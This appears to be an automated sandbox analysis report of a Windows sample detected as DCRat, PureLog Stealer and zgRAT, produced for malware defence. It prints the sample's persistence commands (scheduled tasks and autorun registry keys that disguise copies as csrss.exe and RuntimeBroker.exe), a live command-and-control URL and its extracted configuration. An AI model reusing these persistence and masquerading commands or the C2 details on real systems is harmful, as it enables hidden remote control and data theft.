Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4ra1Fo2Zql.exe

Overview

General Information

Sample name:4ra1Fo2Zql.exe
renamed because original name is a hash value
Original sample name:1b7d99034e439d9f034c9969f88f7b74.exe
Analysis ID:1501437
MD5:1b7d99034e439d9f034c9969f88f7b74
SHA1:8e40bdcdf5092e0afea38110d5f7d4db60c45548
SHA256:916768dc2a2389d20b0216b9fa62c953860eaaee368f529b820ac009f11018b1
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4ra1Fo2Zql.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\4ra1Fo2Zql.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
    • schtasks.exe (PID: 7096 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5888 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4124 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 5316 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6580 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 5628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2260 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5632 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4040 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5860 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2260 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5620 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5632 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\user\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5620 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7192 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7216 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7240 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7264 cmdline: schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7288 cmdline: schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7312 cmdline: schtasks.exe /create /tn "4ra1Fo2Zql" /sc ONLOGON /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7340 cmdline: schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7392 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7460 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7500 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • csrss.exe (PID: 7752 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • GrVEPTmsoNTbY.exe (PID: 7096 cmdline: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
    • cmd.exe (PID: 7848 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7900 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7932 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • GrVEPTmsoNTbY.exe (PID: 4124 cmdline: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • 4ra1Fo2Zql.exe (PID: 7384 cmdline: C:\Users\user\Desktop\4ra1Fo2Zql.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • 4ra1Fo2Zql.exe (PID: 7420 cmdline: C:\Users\user\Desktop\4ra1Fo2Zql.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • csrss.exe (PID: 7452 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • csrss.exe (PID: 7476 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • RuntimeBroker.exe (PID: 7492 cmdline: C:\Users\user\RuntimeBroker.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • RuntimeBroker.exe (PID: 7528 cmdline: C:\Users\user\RuntimeBroker.exe MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • GrVEPTmsoNTbY.exe (PID: 7716 cmdline: "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • csrss.exe (PID: 8096 cmdline: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe" MD5: 1B7D99034E439D9F034C9969F88F7B74)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal", "MUTEX": "DCR_MUTEX-ln07BHafEPq82yTj5rEF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
4ra1Fo2Zql.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    4ra1Fo2Zql.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: 4ra1Fo2Zql.exe PID: 5688JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: GrVEPTmsoNTbY.exe PID: 7096JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: GrVEPTmsoNTbY.exe PID: 7716JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.4ra1Fo2Zql.exe.30000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.4ra1Fo2Zql.exe.30000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetFilename: C:\Users\user\RuntimeBroker.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, NewProcessName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, OriginalFileName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", ProcessId: 7452, ProcessName: csrss.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GrVEPTmsoNTbY
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ra1Fo2Zql.exe", ParentImage: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ParentProcessId: 5688, ParentProcessName: 4ra1Fo2Zql.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", ProcessId: 5316, ProcessName: csc.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ProcessId: 5688, TargetFilename: C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, NewProcessName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, OriginalFileName: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe", ProcessId: 7452, ProcessName: csrss.exe

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4ra1Fo2Zql.exe", ParentImage: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ParentProcessId: 5688, ParentProcessName: 4ra1Fo2Zql.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline", ProcessId: 5316, ProcessName: csc.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4ra1Fo2Zql.exe", ParentImage: C:\Users\user\Desktop\4ra1Fo2Zql.exe, ParentProcessId: 5688, ParentProcessName: 4ra1Fo2Zql.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f, ProcessId: 5316, ProcessName: schtasks.exe

                              Suricata Signatures

                              Timestamp:2024-08-29T23:03:52.477023+0200
                              SID:2048095
                              Severity:1
                              Source Port:49722
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:53.836158+0200
                              SID:2048095
                              Severity:1
                              Source Port:49715
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:12.255649+0200
                              SID:2048095
                              Severity:1
                              Source Port:49704
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:01.039318+0200
                              SID:2048095
                              Severity:1
                              Source Port:49717
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:44.227003+0200
                              SID:2048095
                              Severity:1
                              Source Port:49720
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:47.305110+0200
                              SID:2048095
                              Severity:1
                              Source Port:49721
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:10.336992+0200
                              SID:2048095
                              Severity:1
                              Source Port:49718
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:57.539412+0200
                              SID:2048095
                              Severity:1
                              Source Port:49716
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:45.070506+0200
                              SID:2048095
                              Severity:1
                              Source Port:49713
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:02:37.961096+0200
                              SID:2048095
                              Severity:1
                              Source Port:49712
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-29T23:03:35.336473+0200
                              SID:2048095
                              Severity:1
                              Source Port:49719
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 4ra1Fo2Zql.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://621287cm.n9shteam2.top/Avira URL Cloud: Label: malware
                              Source: http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.phpAvira URL Cloud: Label: malware
                              Source: http://621287cm.n9shteam2.topAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Desktop\VTXhBlNT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\MjzRNvWG.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Users\user\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\sTRlxExW.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\CAgBdTQY.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\IZdub348jc.batAvira: detection malicious, Label: BAT/Delbat.C
                              Found malware configuration
                              Source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal", "MUTEX": "DCR_MUTEX-ln07BHafEPq82yTj5rEF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\MjzRNvWG.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\VTXhBlNT.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\fuHfGerv.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\gwaXxxDZ.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\myawJPbK.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\xxMkqOtN.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\RuntimeBroker.exeReversingLabs: Detection: 65%
                              Multi AV Scanner detection for submitted file
                              Source: 4ra1Fo2Zql.exeReversingLabs: Detection: 65%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\VTXhBlNT.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\MjzRNvWG.logJoe Sandbox ML: detected
                              Source: C:\Users\user\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\cPGganVc.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\VLoPWCmN.logJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 4ra1Fo2Zql.exeJoe Sandbox ML: detected
                              Source: 4ra1Fo2Zql.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDirectory created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDirectory created: C:\Program Files\Windows Portable Devices\b4601131bf8590Jump to behavior
                              Source: 4ra1Fo2Zql.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: \System.pdb source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2199358921.000000001B952000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp
